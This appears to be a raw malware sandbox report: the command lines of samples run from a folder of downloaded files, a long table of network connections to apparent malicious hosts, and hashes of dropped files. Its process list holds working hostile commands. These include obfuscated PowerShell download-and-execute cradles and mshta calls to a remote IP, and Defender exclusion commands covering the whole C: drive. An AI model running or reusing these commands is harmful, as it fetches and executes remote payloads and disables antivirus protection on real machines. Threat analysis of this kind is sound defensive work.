C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ConsoleApp2.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update

C:\Windows\system32\mshta.exe

mshta http://176.113.115.178/Windows-Update

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\abc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PXray_Cast_Sort.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe"

C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe

"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGDGIJKFIJDA" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
N/A 127.0.0.1:49848 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
CH 138.188.36.82:80 138.188.36.82 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
DE 62.216.196.186:80 62.216.196.186 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
IT 93.47.199.117:80 93.47.199.117 tcp
TW 122.116.26.47:4080 122.116.26.47 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
TW 122.116.26.47:8443 122.116.26.47 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
CN 49.81.203.0:111 tcp
KR 222.104.204.78:8000 222.104.204.78 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
KR 59.19.185.137:8602 59.19.185.137 tcp
CN 47.103.126.166:8072 tcp
ES 37.13.48.49:80 37.13.48.49 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
KR 121.154.20.150:80 121.154.20.150 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
KR 14.37.138.88:8602 14.37.138.88 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
NL 85.31.47.135:80 85.31.47.135 tcp
BG 87.121.86.16:80 utorrent-backup-server4.top tcp
BG 87.121.86.206:80 87.121.86.206 tcp
BG 87.121.86.206:443 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 158.101.35.62:9000 158.101.35.62 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 172.67.204.246:443 cdn.chuk.cz tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 update-checker-status.cc udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
CN 180.140.124.53:60 tcp
HK 219.73.22.64:8084 219.73.22.64 tcp
DE 38.242.241.140:80 38.242.241.140 tcp
CN 49.234.48.162:80 tcp
CN 36.110.15.211:9000 tcp
CN 202.107.235.202:8088 tcp
MA 102.53.15.54:80 102.53.15.54 tcp
CN 203.2.65.29:8081 tcp
BG 87.121.86.16:80 update-checker-status.cc tcp
US 8.8.8.8:53 89.103.15.80.in-addr.arpa udp
US 8.8.8.8:53 186.196.216.62.in-addr.arpa udp
US 8.8.8.8:53 135.47.31.85.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 206.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 117.199.47.93.in-addr.arpa udp
US 8.8.8.8:53 215.108.137.109.in-addr.arpa udp
US 8.8.8.8:53 82.36.188.138.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 220.34.188.138.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 246.204.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 49.48.13.37.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 244.250.118.111.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 1.98.145.166.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 192.224.89.179.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 117.60.175.202.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 137.185.19.59.in-addr.arpa udp
US 8.8.8.8:53 140.241.242.38.in-addr.arpa udp
US 8.8.8.8:53 47.26.116.122.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 117.72.70.169:80 tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
US 172.66.0.235:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
US 204.138.94.134:443 microsecurityupdate.com tcp
CN 59.110.104.183:8888 hnjgdl.geps.glodon.com tcp
CN 39.106.158.243:80 soft.110route.com tcp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 113.106.6.106:14319 tcp
US 172.67.219.35:80 adf6.adf6.com tcp
US 50.31.188.149:443 cvinetwork.org tcp
KR 112.217.207.130:80 112.217.207.130 tcp
SG 158.140.133.56:8090 158.140.133.56 tcp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
NL 149.154.167.99:443 t.me tcp
DE 116.203.8.137:443 pivko.sbs tcp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
TH 154.197.69.165:80 154.197.69.165 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 117.72.70.169:80 tcp
CN 121.40.100.23:12616 tcp
KR 146.56.118.137:80 146.56.118.137 tcp
CN 39.108.237.194:80 tcp
KR 203.232.37.151:80 203.232.37.151 tcp
DE 185.254.96.92:80 185.254.96.92 tcp
HK 103.73.160.35:80 103.73.160.35 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 74.64.155.4:9090 74.64.155.4 tcp
CN 117.50.95.62:9880 paytest.infinitegalaxy.cn tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 192.74.234.120:80 ad.adf6.com tcp
US 204.138.94.134:80 microsecurityupdate.com tcp
US 23.122.210.174:80 23.122.210.174 tcp
IR 217.172.98.87:80 karoonpc.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
GB 142.250.178.14:443 clients2.google.com tcp
US 206.217.142.166:1234 tcp
CN 117.157.17.194:9999 tcp
KR 114.201.95.60:80 www.medises.co.kr tcp
GB 64.210.156.22:443 ht-cdn2.adtng.com tcp
GB 64.210.156.22:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 22.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 17.156.210.64.in-addr.arpa udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.18:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 66.254.114.171:443 a.adtng.com tcp
US 3.222.106.254:443 ads.traffichunt.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
GB 64.210.156.0:443 hw-cdn2.adtng.com tcp
GB 2.20.12.102:443 th-cdnv1.akamaized.net tcp
DE 116.203.8.137:443 pivko.sbs tcp
GB 216.58.204.91:443 storage.googleapis.com tcp
US 216.239.34.36:443 region1.google-analytics.com udp
IN 180.150.240.238:80 180.150.240.238 tcp
DE 116.203.8.137:443 pivko.sbs tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
TR 176.53.14.120:80 elisans.novayonetim.com tcp
CN 180.117.160.2:80 tcp
SE 85.230.143.101:80 85.230.143.101 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
GB 89.197.154.115:80 89.197.154.115 tcp
CN 122.228.207.55:80 qiniuyunxz.yxflzs.com tcp
RU 185.215.113.205:8080 185.215.113.205 tcp
AT 91.142.27.138:80 qgf338jtt8tty7rx.myfritz.net tcp
HK 47.79.64.236:443 b46.oss-cn-hongkong.aliyuncs.com tcp
CN 203.2.65.29:8085 tcp
CN 101.126.11.168:80 tcp
UA 185.156.72.65:80 185.156.72.65 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
KR 152.67.212.187:443 tcp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 180.167.115.186:8011 tcp
US 100.16.168.239:3216 100.16.168.239 tcp
CN 39.100.33.142:9092 tcp
TH 45.141.26.180:80 45.141.26.180 tcp
VN 103.42.55.251:9999 103.42.55.251 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
HK 58.152.32.99:8001 58.152.32.99 tcp
CN 119.32.29.121:8309 tcp
AU 80.249.6.118:8084 80.249.6.118 tcp
US 34.102.78.64:9002 34.102.78.64 tcp
CN 101.133.156.69:7777 tcp
US 185.208.156.226:80 185.208.156.226 tcp
CN 113.106.6.106:14417 tcp
CN 47.104.169.91:80 tcp
JP 18.181.154.24:80 18.181.154.24 tcp
US 144.172.71.105:1338 144.172.71.105 tcp
CN 115.28.26.10:8080 tcp
CN 101.71.255.146:8195 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
KR 152.67.212.187:443 tcp
DE 116.203.8.137:443 pivko.sbs tcp
AT 91.142.27.138:80 qgf338jtt8tty7rx.myfritz.net tcp
CN 119.45.127.116:8080 tcp
US 144.34.162.13:80 144.34.162.13 tcp
LU 107.189.5.6:80 107.189.5.6 tcp
US 8.8.8.8:53 64.78.102.34.in-addr.arpa udp
US 8.8.8.8:53 99.32.152.58.in-addr.arpa udp
US 8.8.8.8:53 118.6.249.80.in-addr.arpa udp
US 8.8.8.8:53 24.154.181.18.in-addr.arpa udp
US 8.8.8.8:53 251.55.42.103.in-addr.arpa udp
US 8.8.8.8:53 180.26.141.45.in-addr.arpa udp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 146.0.42.82:80 146.0.42.82 tcp
CN 122.51.183.116:1234 tcp
UA 176.38.22.34:80 176.38.22.34 tcp
DE 116.203.8.137:443 pivko.sbs tcp
IN 122.179.136.112:80 122.179.136.112 tcp
CN 39.103.217.92:80 tcp
DE 116.203.8.137:443 pivko.sbs tcp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
US 154.216.17.44:80 main.dsn.ovh tcp
CN 121.4.173.197:443 data.discuz.mobi tcp
GB 163.181.154.240:80 update.cg100iii.com tcp
KR 183.115.102.3:80 183.115.102.3 tcp
CN 223.247.198.16:8072 tcp
US 68.178.207.33:8000 68.178.207.33 tcp
HK 134.122.129.18:80 134.122.129.18 tcp
CN 60.22.23.50:9898 tcp
KR 121.53.201.236:80 cfs13.tistory.com tcp
CN 61.183.42.119:888 dl.natgo.cn tcp
IN 103.14.122.111:80 unicorpbrunei.com tcp
CL 190.215.253.57:80 190.215.253.57 tcp
ES 31.214.180.12:81 31.214.180.12 tcp
DE 116.203.8.137:443 pivko.sbs tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 208.95.112.1:80 ip-api.com tcp
RS 79.101.0.33:443 tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
HK 143.92.62.107:80 143.92.62.107 tcp
DE 116.203.8.137:443 pivko.sbs tcp
GB 89.197.154.115:7700 tcp
DE 116.203.8.137:443 pivko.sbs tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 34.102.78.64:9002 34.102.78.64 tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
RU 193.233.48.194:80 193.233.48.194 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
US 69.42.215.252:80 freedns.afraid.org tcp
DE 116.203.8.137:443 pivko.sbs tcp
RU 176.113.115.178:80 176.113.115.178 tcp
TH 154.197.69.165:7000 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
HK 8.217.48.27:80 www.qqqmy.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
US 204.9.23.122:85 204.9.23.122 tcp
DE 116.203.8.137:443 pivko.sbs tcp
VN 103.42.55.251:8080 tcp
GB 89.197.154.115:7700 tcp
DE 116.203.8.137:443 pivko.sbs tcp
LV 198.181.163.35:4410 frojbdawmiojfg.sytes.net tcp
CN 183.60.150.17:80 qiniuyunxz.yxflzs.com tcp
CN 117.50.194.20:80 tcp
US 208.86.224.90:80 cd.textfiles.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
TH 45.141.26.180:443 tcp
DE 116.203.8.137:443 pivko.sbs tcp
KR 125.186.91.61:80 125.186.91.61 tcp
RU 176.113.115.178:80 176.113.115.178 tcp
DE 116.203.8.137:443 pivko.sbs tcp
IE 52.218.28.228:80 alien-training.com tcp
HK 47.243.125.164:80 www.bkzj.wang tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
DE 116.203.8.137:443 pivko.sbs tcp
NL 188.42.129.148:80 rl.ammyy.com tcp
DE 136.243.104.235:443 tcp
NL 85.31.47.143:39001 venom.underground-cheat.com tcp
DE 116.203.8.137:443 pivko.sbs tcp
CN 59.175.183.106:6713 tcp
CN 120.41.68.229:9096 klfs.synology.me tcp
HK 103.149.92.191:80 103.149.92.191 tcp
KR 210.216.165.152:80 storage.soowim.co.kr tcp
US 166.166.188.230:80 166.166.188.230 tcp
GB 89.197.154.115:7700 tcp
NL 85.31.47.135:80 cheat.underground-cheat.com tcp
IN 116.206.151.203:478 tcp
VN 103.110.33.188:80 tcp
RU 176.111.174.140:80 tcp
KR 119.194.226.67:80 www.ojang.pe.kr tcp
VN 103.110.33.188:80 tcp
US 104.243.129.2:80 tcp
CN 47.104.233.213:8072 tcp
CN 47.120.46.210:80 tcp
CN 61.131.3.86:9991 tcp
DE 217.92.214.15:8088 tcp
RU 77.72.254.210:17017 tcp
DE 45.76.89.70:80 pool.hashvault.pro tcp
CN 114.55.106.136:80 tcp
CN 47.98.177.117:8888 tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI25002\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

C:\Users\Admin\AppData\Local\Temp\_MEI25002\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

C:\Users\Admin\AppData\Local\Temp\_MEI25002\base_library.zip

MD5 9836732a064983e8215e2e26e5b66974
SHA1 02e9a46f5a82fa5de6663299512ca7cd03777d65
SHA256 3dfe7d63f90833e0f3de22f450ed5ee29858bb12fe93b41628afe85657a3b61f
SHA512 1435ba9bc8d35a9336dee5db06944506953a1bcf340e9bdad834828170ce826dcfb1fa80274cd9df667e47b83348139b38ab317055a5a3e6824df15adf8a4d86

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_ctypes.pyd

MD5 6a9ca97c039d9bbb7abf40b53c851198
SHA1 01bcbd134a76ccd4f3badb5f4056abedcff60734
SHA256 e662d2b35bb48c5f3432bde79c0d20313238af800968ba0faa6ea7e7e5ef4535
SHA512 dedf7f98afc0a94a248f12e4c4ca01b412da45b926da3f9c4cbc1d2cbb98c8899f43f5884b1bf1f0b941edaeef65612ea17438e67745962ff13761300910960d

C:\Users\Admin\AppData\Local\Temp\_MEI25002\python3.DLL

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\_MEI25002\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_cffi_backend.cp311-win_amd64.pyd

MD5 739d352bd982ed3957d376a9237c9248
SHA1 961cf42f0c1bb9d29d2f1985f68250de9d83894d
SHA256 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980
SHA512 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_uuid.pyd

MD5 9a4957bdc2a783ed4ba681cba2c99c5c
SHA1 f73d33677f5c61deb8a736e8dde14e1924e0b0dc
SHA256 f7f57807c15c21c5aa9818edf3993d0b94aef8af5808e1ad86a98637fc499d44
SHA512 027bdcb5b3e0ca911ee3c94c42da7309ea381b4c8ec27cf9a04090fff871db3cf9b7b659fdbcfff8887a058cb9b092b92d7d11f4f934a53be81c29ef8895ac2b

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_socket.pyd

MD5 8140bdc5803a4893509f0e39b67158ce
SHA1 653cc1c82ba6240b0186623724aec3287e9bc232
SHA256 39715ef8d043354f0ab15f62878530a38518fb6192bc48da6a098498e8d35769
SHA512 d0878fee92e555b15e9f01ce39cfdc3d6122b41ce00ec3a4a7f0f661619f83ec520dca41e35a1e15650fb34ad238974fe8019577c42ca460dde76e3891b0e826

C:\Users\Admin\AppData\Local\Temp\_MEI25002\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_queue.pyd

MD5 ff8300999335c939fcce94f2e7f039c0
SHA1 4ff3a7a9d9ca005b5659b55d8cd064d2eb708b1a
SHA256 2f71046891ba279b00b70eb031fe90b379dbe84559cf49ce5d1297ea6bf47a78
SHA512 f29b1fd6f52130d69c8bd21a72a71841bf67d54b216febcd4e526e81b499b9b48831bb7cdff0bff6878aab542ca05d6326b8a293f2fb4dd95058461c0fd14017

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_hashlib.pyd

MD5 de4d104ea13b70c093b07219d2eff6cb
SHA1 83daf591c049f977879e5114c5fea9bbbfa0ad7b
SHA256 39bc615842a176db72d4e0558f3cdcae23ab0623ad132f815d21dcfbfd4b110e
